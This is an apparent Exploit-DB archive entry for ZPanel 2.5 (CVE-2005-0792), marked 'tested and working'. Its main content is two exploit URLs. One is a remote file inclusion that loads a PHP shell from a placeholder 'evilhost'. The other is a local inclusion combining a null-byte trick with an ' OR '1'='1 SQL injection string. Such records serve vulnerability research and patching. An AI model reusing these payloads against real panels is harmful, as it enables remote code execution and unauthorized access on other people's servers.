Lucene search
MikhailEDB-ID:881HistoryMar 15, 2005 - 12:00 a.m.
ZPanel 2.5 - SQL Injection
2005-03-1500:00:00
Mikhail
www.exploit-db.com
36
AI Score
7.4
Confidence
Low
# Tested and working /str0ke
It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.
[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script
[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
# milw0rm.com [2005-03-15]Related
cvelist
cvelist
CVE-2005-0792
2005-03-20 05:00:00
nvd
nvd
CVE-2005-0792
2005-03-15 05:00:00
cve
cve
CVE-2005-0792
2005-03-20 05:00:00